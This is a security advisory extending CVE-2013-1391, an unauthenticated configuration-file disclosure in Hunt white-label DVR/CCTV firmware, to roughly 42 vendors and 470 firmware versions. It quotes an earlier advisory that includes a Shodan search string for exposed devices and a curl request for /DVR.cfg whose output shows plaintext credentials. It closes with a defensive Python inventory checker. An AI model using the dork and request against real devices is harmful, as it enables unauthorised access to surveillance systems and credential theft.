Title:
Multiple DVR/CCTV/IPcam Manufacturers Configuration Disclosure - Original CVE-2013-1391 extended to Hunt, Huntelec plus around 40 vendors customizing Hunt products
References:
ACSA-2013-022
(extends the impacted vendor/product of CVE-2013-1391)
Timeline:
xx Nov 2013 - Vulnerability discovered in more vendors/products than originally stated in CVE-2013-1391
21 Nov 2013 - Vendor notified, fix and disclosure timeline proposed to the vendor (also, as part of ACSA-2013-009/CVE-2013-5652)
22 Nov 2013 - Vendor replies "Hunt is a ODM manufacture , if we hope to do any change. We need to let our customer know. I will let them know it. When we get the response we will let you know our solution."
13 Dec 2013 - Follow-up with the vendor
12 Oct 2014 - Public disclosure
Related references:
ACSA-2013-009
CVE-2013-5652
Author:
Andrei Costin of "FIRMWARE.RE" project
andrei@firmware.re
andrei@andreicostin.com
Vulnerability discovered using "FIRMWARE.RE" platform/service
Vendors (main, white-label):
Hunt (http://www.hunt.com.tw/)
Vendors (customizing/marketing, by firmware code):
SV:
SVAT (http://svat.com)
ES:
http://www.oceancctv.com.tw/mypage.php?id=2
AZ:
http://www.cctvthailand.com/index.php?mo=21&list&hotdownload&p=4
http://hiview.igetweb.com/index.php?mo=21&list&newreleases&p=7
http://webcache.googleusercontent.com/search?q=cache:m-OAI7hvGRwJ:www.hiview.co.th/index.php%3Fmo%3D21%26list%26catid%3D7946+&cd=1&hl=en&ct=clnk&gl=fr&client=ubuntu
LI:
http://www.meritlilin.com/en/support-download.asp?c3#c3
http://www.lilin.tv/downloads
http://www.lilin.co.uk/
http://www.meritlilin.com/en/livedemo.asp
https://www.google.fr/search?client=ubuntu&channel=fs&q="LI2.1.93"
https://www.google.fr/search?client=ubuntu&channel=fs&q=DVR216-LI2.1.93.zip
http://www.generalfiles.biz/download/gs497df0ddh32i0/DVR216.zip.html
Affected firmware:
The list of affected firmware is attached (470 unique software versions, across approx. 42 vendors deriving from the hunt.com.tw generic/white-label brand)
AM1.1.17
AM1.1.42
AM1.1.45
AM1.1.52
AM1.1.62
AM1.1.67
AM1.1.69
AM1.1.72
AM2.1.75
AZ1.1.17
AZ1.1.20
AZ1.1.24
AZ1.1.26
AZ1.1.29
AZ1.1.45
AZ1.1.50
AZ1.1.61
AZ1.1.67
AZ1.1.68
AZ1.1.70
AZ1.1.80
AZ2.1.71
AZ2.1.72
AZ2.1.76
AZ2.1.77
AZ2.1.78
AZ2.1.81
AZ2.1.92
CO1.1.16
CO1.1.41
CO1.1.52
CO1.1.65
CO1.1.68
D1.1.12
D1.1.15
D1.1.17
D1.1.22
D1.1.28
D1.1.36
D1.1.39
D1.1.43
D1.1.45
D1.1.61
D1.1.62
D1.1.67
D1.1.70
D2.1.71
D2.1.76
ER1.1.22
ER1.1.24
ER1.1.52
ER1.1.54
ER1.1.61
ER2.1.72
ER2.1.74
ER2.1.80
ES1.1.16
ES1.1.17
ES1.1.18
ES1.1.38
ES1.1.40
ES1.1.42
ES1.1.43
ES1.1.45
ES1.1.46
ES1.1.49
ES1.1.51
ES1.1.52
ES1.1.54
ES1.1.55
ES1.1.57
ES1.1.59
ES1.1.61
ES1.1.63
ES1.1.65
ES1.1.67
ES1.1.68
ES1.1.69
ES1.1.70
ES1.1.71
ES1.1.74
ES1.1.75
ES1.1.76
ES1.1.90
ES2.1.71
ES2.1.72
ES2.1.73
ES2.1.74
ES2.1.75
ES2.1.76
ES2.1.77
ES2.1.80
ES2.1.81
ES2.1.90
ES2.1.92
F1.1.23
F1.1.25
F1.1.29
F1.1.30
F1.1.32
F1.1.33
F1.1.35
F1.1.39
F1.1.43
F1.1.45
F1.1.48
F1.1.49
F1.1.52
F1.1.53
F1.1.60
F1.1.63
F1.1.66
F1.1.67
F1.1.69
F1.1.70
F1.1.72
F2.1.71
FO1.1.19
FO1.1.49
FO1.1.69
FO2.1.79
H1.1.27
HM1.1.51
HM1.1.70
HM2.1.72
HM2.1.77
I1.1.14
I1.1.17
I1.1.32
I1.1.35
I1.1.42
I1.1.47
I1.1.60
I1.1.61
I1.1.68
I1.1.74
I2.1.75
I2.1.81
IA2.1.80
IA2.1.81
K1.1.40
K1.1.41
K1.1.45
K1.1.50
K1.1.55
K1.1.60
K1.1.68
K1.1.75
K2.1.80
KB1.1.45
KU1.1.55
KU1.1.75
KU2.1.80
L1.1.42
L1.1.48
L1.1.61
LI1.1.21
LI1.1.22
LI1.1.25
LI1.1.26
LI1.1.27
LI1.1.28
LI1.1.29
LI1.1.30
LI1.1.42
LI1.1.49
LI1.1.51
LI1.1.55
LI1.1.56
LI1.1.57
LI1.1.59
LI1.1.61
LI1.1.63
LI1.1.64
LI1.1.73
LI1.1.74
LI2.1.71
LI2.1.75
LI2.1.76
LI2.1.77
LI2.1.78
LI2.1.80
LI2.1.81
LI2.1.90
LI2.1.93
LW1.1.32
LW2.0.02
LW2.0.03
LW2.0.04
LW2.0.05
LW2.0.06
LW2.0.15
LW3.0.04
LW3.0.05
LW3.0.07
M1.1.48
M1.1.60
M1.1.65
N1.1.49
N1.1.51
N1.1.52
N1.1.57
N1.1.61
N1.1.65
N1.1.69
N1.1.78
N1.1.79
N2.1.79
PE1.1.55
PE1.1.69
PE2.1.77
PR1.1.51
PR1.1.52
PR1.1.54
Q1.1.55
Q1.1.64
QF1.1.62
QF1.1.64
RO1.1.16
RO1.1.17
RO1.1.39
RO1.1.45
RO1.1.55
RO1.1.67
RO2.1.71
S1.1.39
SA1.1.17
SA1.1.18
SA1.1.24
SA1.1.25
SA1.1.28
SA1.1.30
SA1.1.45
SA1.1.48
SA1.1.55
SA1.1.59
SA1.1.61
SA1.1.67
SA1.1.69
SA1.1.70
SA1.1.80
SA1.1.85
SA2.1.81
SG1.1.17
SG1.1.19
SG1.1.28
SG1.1.69
SG2.1.71
SI1.1.38
SI1.1.39
SI1.1.45
SI1.1.54
SV1.1.46
SV1.1.51
SV1.1.52
SV1.1.68
SV1.1.71
SV1.1.74
SV2.1.71
SV2.1.74
SV2.1.81
SV3.1.72
SV3.1.74
TO1.1.17
TO1.1.49
TO1.1.50
TO1.1.52
TO1.1.55
TO1.1.61
TO1.1.69
TO1.1.70
TO1.1.75
TO2.1.71
TO2.1.72
TO2.1.80
TO2.1.90
TY1.1.20
TY1.1.50
TY1.1.70
TY2.1.70
TY2.1.71
TY3.1.75
U1.1.45
U1.1.67
UK1.1.67
UK1.1.74
UK2.1.72
UK2.1.77
V1.1.09
V1.1.12
V1.1.14
V1.1.15
V1.1.16
V1.1.17
V1.1.19
V1.1.20
V1.1.21
V1.1.22
V1.1.22ND
V1.1.23
V1.1.24
V1.1.24ND
V1.1.25
V1.1.26
V1.1.27
V1.1.28
V1.1.28ND
V1.1.29
V1.1.31
V1.1.33
V1.1.35
V1.1.38
V1.1.39
V1.1.40
V1.1.41
V1.1.42
V1.1.43
V1.1.45
V1.1.48
V1.1.49
V1.1.50
V1.1.51
V1.1.52
V1.1.52ND
V1.1.53
V1.1.53ND
V1.1.54
V1.1.54ND
V1.1.55
V1.1.57
V1.1.58
V1.1.60
V1.1.61
V1.1.61ND
V1.1.62
V1.1.65
V1.1.66
V1.1.67
V1.1.68
V1.1.69
V1.1.69D
V1.1.70
V1.1.71
V1.1.72
V1.1.73
V1.1.74
V1.1.75ND
V1.1.77
V1.1.78D
V1.1.80
V1.1.80ND
V1.1.81
V1.1.90
V1.1.90ND
V1.1.92ND
V1.47
V1.48
V1.50
V1.51
V2.0.04
V2.0.15
V2.1.69
V2.1.71
V2.1.71ND
V2.1.72
V2.1.72ND
V2.1.74
V2.1.74ND
V2.1.75
V2.1.75ND
V2.1.77
V2.1.77ND
V2.1.80
V2.1.80ND
V2.1.81
V2.1.81ND
V2.1.83
V2.1.84
V2.1.90
V2.1.90ND
V2.1.92
V2.1.92ND
V3.1.72ND
V3.1.74ND
V3.1.75ND
V3.1.77ND
V3.1.79ND
V3.1.80
V3.1.90
V3.1.90ND
V3.1.92ND
VA1.1.28
VA2.1.79
VY1.1.66ND
VY1.1.71ND
VY1.1.72NDS
VY1.1.73ND
W1.1.39
WT1.1.22
WT1.1.28
WT1.1.45
WT1.1.46
WT1.1.49
WT1.1.52
WT1.1.58
WT1.1.61
WT1.1.62
WT1.1.70
WT2.1.72
WT2.1.75
WT2.1.79
X1.1.100
X1.1.94
Y1.1.07
Y1.1.09
Y1.1.13
Y1.1.14
Y1.1.16
Y1.1.17
Y1.1.18
Y1.1.19
Y1.1.25
Y1.1.35
Y1.1.38
Y1.1.39
Y1.1.40
Y1.1.42
Y1.1.43
Y1.1.45
Y1.1.49
Y1.1.50
Y1.1.52
Y1.1.54
Y1.1.55
Y1.1.60
Y1.1.61
Y1.1.62
Y1.1.65
Y1.1.66
Y1.1.68
Y1.1.69
Y1.1.70
Y1.1.74
Y1.1.75
Y1.1.90
Y2.1.70
Y2.1.71
Y2.1.72
Y2.1.74
Y2.1.75
Y2.1.77
Y2.1.80
Y2.1.81
YP1.1.17
YP1.1.18
YP1.1.32
YP1.1.40
YP1.1.45
YP1.1.47
YP1.1.48
YP1.1.49
YP1.1.50
YP1.1.52
YP1.1.55
YP1.1.66
YP1.1.67
YP1.1.68
YP1.1.73
YP2.1.70
YP2.1.74
Vulnerability details:
From http://packetstormsecurity.com/files/119871/Hunt-CCTV-Credential-Disclosure.html
****************************************************************************
Hunt CCTV (and generics brands) Insufficient Authentication
January 17, 2013 - A. Ramos
-- CVE ID:
CVE-2013-1391 [reserved]
-- Affected Vendors:
Hunt CCTV (http://www.huntcctv.com/)
** generic brands from Hunt **
Capture CCTV (http://www.capturecctv.ca/)
NoVus CCTV (http://www.novuscctv.com/)
Well-Vision Inc (http://well-vision.com/)
-- Affected Models:
DVR-04 / DVR-04CH (HuntCCTV)
DVR-04NC (HuntCCTV)
DVR-08 / DVR-08CH (HuntCCTV)
DVR-08NC (HuntCCTV)
DVR-16 / DVR-16CH (HuntCCTV)
CDR 0410VE (CaptureCCTV-HuntCCTV)
CDR 0820VDE (CaptureCCTV-HuntCCTV)
DR6-704A4H (HuntCCTV)
DR6-708A4H (HuntCCTV)
DR6-7316A4H (HuntCCTV)
DR6-7316A4HL (HuntCCTV)
HDR-04KD (unknown-HuntCCTV)
HDR-08KD (unknown-HuntCCTV)
HV-04RD PRO (Hachi-HuntCCTV)
HV-08RD PRO (Hachi-HuntCCTV)
NV-DVR1204 (NovusSec)
NV-DVR1208 (NovusSec)
NV-DVR1216 (NovusSec)
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)
Shodan dork: Basic realm="DVR" server: httpd -mini
Shodan results: 46890
Vulnerable: >70%
-- Vulnerability Details:
You can get the entire backup config with simple GET. No authentication required.
All information is in clear text: admin panel, DDNS config, PPPoE credentials, misc.
Example:
[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i USER
* Trying x.x.x.x... connected
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)
> GET /DVR.cfg HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2
> Host: x.x.x.x
> Accept: */*
>
< HTTP/1.0 200 Ok
< Server: httpd
< Date: Fri, 17 Jan 2013 05:47:02 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: 0
< Connection: close
< Content-Type: application/octet-stream
<
USER1_USERNAME=iam
USER1_PASSWORD=sexy
Vulnerable firmware (127 different ones):
- 1.1.10 to 1.1.92
- 1.47 to 1.51
- 2.0.0 to 2.1.93
- 3.0.04 to 3.1.92
-- Disclosure Timeline:
2011-09-?? - Vulnerability discovered
2012-12-20 - Published in the book "Hacker Epico" (http://www.hackerepico.com)
2013-01-15 - CVE Assigned
2013-01-20 - Vulnerability reported to vendor
2013-01-24 - Vulnerability reported to GDT (Spain)
2013-01-28 - Public disclosure:
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html
--
Alejandro Ramos
www.securitybydefault.com
****************************************************************************
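Added example (not part of either advisory, and not FIRMWARE.RE code): a Python check for an asset inventory that parses firmware strings of the form used in the affected-firmware list (vendor code, dotted version, optional suffix such as ND) and reports whether each one is in this advisory's list and whether its numeric part falls in the ranges quoted from CVE-2013-1391. LISTED_SAMPLE is a short excerpt of the list; the hostnames, the inventory and all function names are constructed for this example.

```python
import re

# Inclusive numeric ranges quoted from the CVE-2013-1391 advisory text.
ORIGINAL_RANGES = [
    ((1, 1, 10), (1, 1, 92)),
    ((1, 47), (1, 51)),
    ((2, 0, 0), (2, 1, 93)),
    ((3, 0, 4), (3, 1, 92)),
]

# Excerpt of this advisory's affected-firmware list; load all 470 in real use.
LISTED_SAMPLE = {"LI2.1.93", "SV3.1.74", "V1.1.22ND", "V1.47",
                 "X1.1.94", "Y1.1.07", "VY1.1.72NDS"}

# <vendor code: 1-2 letters><dotted version><optional letter suffix>
FW_RE = re.compile(r"^([A-Z]{1,2})(\d+(?:\.\d+)+)([A-Z]*)$")

def parse_firmware(text):
    """'V1.1.22ND' -> ('V', (1, 1, 22), 'ND'); None if the string is malformed."""
    m = FW_RE.match(text.strip().upper())
    if not m:
        return None
    code, version, suffix = m.groups()
    return code, tuple(int(p) for p in version.split(".")), suffix

def in_original_range(version):
    # Only compare against ranges with the same number of version components.
    return any(len(version) == len(lo) and lo <= version <= hi
               for lo, hi in ORIGINAL_RANGES)

def assess(text, listed=LISTED_SAMPLE):
    """Return None for malformed input, else a dict of match results."""
    parsed = parse_firmware(text)
    if parsed is None:
        return None
    code, version, suffix = parsed
    return {"code": code, "version": version, "suffix": suffix,
            "listed": text.strip().upper() in listed,
            "in_range": in_original_range(version)}

def flag_inventory(inventory, listed=LISTED_SAMPLE):
    """Hosts whose firmware is listed here or inside the 2013 ranges."""
    results = ((host, assess(fw, listed)) for host, fw in inventory)
    return [h for h, r in results if r and (r["listed"] or r["in_range"])]

if __name__ == "__main__":
    # Constructed inventory: (hostname, firmware string shown by the device).
    sample = [("dvr-lobby", "li2.1.93"), ("dvr-dock", "X1.1.94"),
              ("dvr-lab", "V4.0.1"), ("dvr-gate", "n/a")]
    print(flag_inventory(sample))
```

Entries such as X1.1.94 and Y1.1.07 appear in the extended list but fall outside the 2013 numeric ranges, so match inventory against the full list rather than the ranges alone.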
About the author/project:
Firmware.RE is part of the Firmware Genome Project.
Firmware.RE is a free online service that:
- unpacks, scans and analyzes almost any firmware package and facilitates the quick detection of vulnerabilities, backdoors and all kinds of embedded malware.
- facilitates firmware mounting, modification, loading and emulation.
- facilitates firmware vulnerability and backdoor discovery.
- helps secure your embedded and internet-of-things devices.